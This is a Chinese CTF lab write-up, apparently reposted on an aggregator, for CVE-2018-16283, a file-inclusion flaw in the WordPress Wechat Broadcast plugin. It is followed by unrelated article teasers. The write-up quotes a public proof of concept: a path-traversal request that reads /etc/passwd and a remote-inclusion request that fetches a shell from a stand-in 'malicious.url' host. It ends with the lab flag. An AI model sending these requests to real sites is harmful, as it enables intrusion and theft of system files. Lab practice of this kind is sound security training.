春秋云镜 CVE-2018-16283

news/2024/11/15 15:37:22/文章来源:https://blog.csdn.net/qq_22002773/article/details/132616525

春秋云镜 CVE-2018-16283 WordPress Plugin Wechat Broadcast LFI

靶标介绍

WordPress Plugin Wechat Broadcast LFI

启动场景

在这里插入图片描述

漏洞利用

exp

# Exploit Title: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
# Author: Manuel Garcia Cardenas
# Date: 2018-09-19
# Software link: https://es.wordpress.org/plugins/wechat-broadcast/
# CVE: CVE-2018-16283# Description
# This bug was found in the file: /wechat-broadcast/wechat/Image.php
# echo file_get_contents(isset($_GET["url"]) ? $_GET["url"] : '');
# The parameter "url" it is not sanitized allowing include local or remote files
# To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol 
# to interact with the application.# PoC
# The following URL have been confirmed that is vulnerable to local and remote file inclusion.GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd# Remote File Inclusion POC:GET /wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=http://malicious.url/shell.txt

在这里插入图片描述
得到flag

flag{dad2c024-563c-4826-b997-1f4fe3f8803a}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/64665.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Spring boot 第一个程序

Spring boot 第一个程序

新建工程选择spring-boot版本右键创建类TestController： 代码如下： package com.example.demo; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springf…

阅读更多...

Empowering Long-tail Item Recommendation through Cross Decoupling Network (CDN)

Empowering Long-tail Item Recommendation through Cross Decoupling Network (CDN)

Empowering Long-tail Item Recommendation through Cross Decoupling Network (CDN) 来源： KDD’2023Google Research 文章目录 Empowering Long-tail Item Recommendation through Cross Decoupling Network (CDN)长尾问题分析CDNItem Memorization and General…

阅读更多...

是否在业务中使用大语言模型？

是否在业务中使用大语言模型？

ChatGPT取得了巨大的成功，在短短一个月内就获得了1亿用户，并激发了企业和专业人士对如何在他们的组织中利用这一工具的兴趣和好奇心。但LLM究竟是什么，它们如何使你的企业受益?它只是一种炒作，还是会长期存在? 在这篇文章中我…

阅读更多...

从零开始的Hadoop学习（六）| HDFS读写流程、NN和2NN工作机制、DataNode工作机制

从零开始的Hadoop学习（六）| HDFS读写流程、NN和2NN工作机制、DataNode工作机制

1. HDFS的读写流程（面试重点） 1.1 HDFS写数据流程 1.1.1 剖析文件写入 （1）客户端通过 Distributed FileSystem 模块向 NameNode 请求上传文件，NameNode检查目标文件是否已存在，父目录是否存在。 &#x…

阅读更多...

springsecurity+oauth 分布式认证授权笔记总结12

springsecurity+oauth 分布式认证授权笔记总结12

一 springsecurity实现权限认证的笔记 1.1 springsecurity的作用 springsecurity两大核心功能是认证和授权，通过usernamepasswordAuthenticationFilter进行认证；通过filtersecurityintercepter进行授权。springsecurity其实多个filter过滤链进行过滤。…

阅读更多...

Google Services Framework 谷歌服务框架的安装以及遇到的常见问题

Google Services Framework 谷歌服务框架的安装以及遇到的常见问题

安装谷歌三件套： 1、Google 服务框架（Google Services Framework）下载地址： https://www.apkmirror.com/apk/google-inc/google-services-framework/ 注意一定要选择与自己手机对应的安卓系统版本的服务框架。 2、Google Play Se…

阅读更多...

Java设计模式：四、行为型模式-05：备忘录模式

Java设计模式：四、行为型模式-05：备忘录模式

文章目录一、定义：备忘录模式二、模拟场景：备忘录模式三、改善代码：备忘录模式3.1 工程结构3.2 备忘录模式模型结构图3.3 备忘录模式定义3.3.1 配置信息类3.3.2 备忘录类3.3.3 记录者类3.3.4 管理员类 3.4 单元测试四、总结：备忘…

阅读更多...

超全的数据可视化大屏设计组件库 sketch格式

超全的数据可视化大屏设计组件库 sketch格式

随着大屏可视化设计需求的发展，可视化sketch矢量素材变得越来越受欢迎，它可以为设计师提供丰富的设计元素，帮助他们更高效更快速的完成设计任务。大屏可视化sketch数量素材是B端可视化设计师们最佳设计资源，它可以帮助设计师轻松…

阅读更多...

React 18 在组件间共享状态

React 18 在组件间共享状态

参考文章在组件间共享状态有时候，希望两个组件的状态始终同步更改。要实现这一点，可以将相关 state 从这两个组件上移除，并把 state 放到它们的公共父级，再通过 props 将 state 传递给这两个组件。这被称为“状态提升”&#…

阅读更多...

Socket交互的基本流程？

Socket交互的基本流程？

TCP socket通信过程图什么是网络编程，网络编程就是编写程序使两台连联网的计算机相互交换数据。怎么交换数据呢？操作系统提供了“套接字”（socket）的组件我们基于这个组件进行网络通信开发。tcp套接字工作流程都以“打电话”来生…

阅读更多...

python异常

python异常

一.什么是异常异常是一个事件，该事件会在程序执行过程中发生，会影响程序的正常运行。一般情况下，python无法正常处理一个异常，会导致程序中断。在出现异常时，为了不影响程序的正常运行，我们需要捕获异常。…

阅读更多...

HTML+JavaScript+CSS DIY 分隔条splitter

HTML+JavaScript+CSS DIY 分隔条splitter

一、需求分析现在电脑的屏幕越来越大，为了利用好宽屏，我们在设计系统UI时喜欢在左侧放个菜单或选项面板，在右边显示与菜单或选项对应的内容，两者之间用分隔条splitter来间隔，并可以通过拖动分隔条splitter来动态调研…

阅读更多...

vue3 ref reactive响应式数据赋值的问题

vue3 ref reactive响应式数据赋值的问题

文章目录 vue3 ref reactive响应式数据赋值的问题场景1:将响应式数据赋值请求后的数据错误示范：直接赋值正确写法场景2：响应式数据解构之后失去响应式原因分析解决办法 toRefs/toRef方法创建ref引用对象 vue3 ref reactive响应式数据赋值的问题 doing…

阅读更多...

DBeaver 23.1.5 发布

DBeaver 23.1.5 发布

导读DBeaver 是一个免费开源的通用数据库工具，适用于开发人员和数据库管理员。DBeaver 23.1.5 现已发布，更新内容如下. Data editor 重新设计了词典查看器面板 UI 空间数据类型：曲线几何线性化已修复数据保存时结果选项卡关闭的问题已解决…

阅读更多...

gitee上传本地项目bug

gitee上传本地项目bug

🤮这个破bug不知道浪费了多长时间，以前没有记录，每次都忘记，这次记下来问题描述 gitee创建仓库，然后根据它提示的如下命令，但一直报错原因分析： 把命令复制出来，粘贴到Sublime …

阅读更多...

vscode 清除全部的console.log

vscode 清除全部的console.log

在放页面的大文件夹view上面右键点击在文件夹中查找 console.log.*$ 注意：要选择使用正则匹配替换为 " " (空字符串)

阅读更多...

gitlab-rake gitlab:backup:create 执行报错 Errno::ENOSPC: No space left on device

gitlab-rake gitlab:backup:create 执行报错 Errno::ENOSPC: No space left on device

gitlab仓库备份执行 gitlab-rake gitlab:backup:create报错如下： 问题分析：存储备份的空间满解决方法： 方法1：清理存放路径，删除不需要文件，释放空间。方法2：创建一个根目录的挂载点&#x…

阅读更多...

在Visual Studio 2017上配置并使用OpenGL

在Visual Studio 2017上配置并使用OpenGL

1 在Visual Studio 2017上配置并使用OpenGL 在GLUT - The OpenGL Utility Toolkit：GLUT - The OpenGL Utility Toolkit中点击“GLUT for Microsoft Windows 95 & NT users”，选择“If you want just the GLUT header file, the .LIB, and .DLL file…

阅读更多...

推进数据要素化，数据云为何是“加速器”？

推进数据要素化，数据云为何是“加速器”？

数据要素化，一个世界性难题。相比于传统生产要素，数据要素具有获得非竞争性、使用非排他性等独有特征，在流通、产权、安全和使用等方面需要法规制度与基础设施的双重保障。我国无疑是最早探索数据要素化的国家之一。从早期成立的各种大数…

阅读更多...

Streamlit 讲解专栏（十一）：数据可视化-图表绘制详解（中）

Streamlit 讲解专栏（十一）：数据可视化-图表绘制详解（中）

文章目录 1 前言2 绘制交互式散点图3 定制图表主题4 增强数据可视化的交互性与注释步骤1步骤二 5 结语 1 前言在上一篇博文《 Streamlit 讲解专栏（十）：数据可视化-图表绘制详解（上）》中，我们学习了一些关…

阅读更多...

推荐文章

最新文章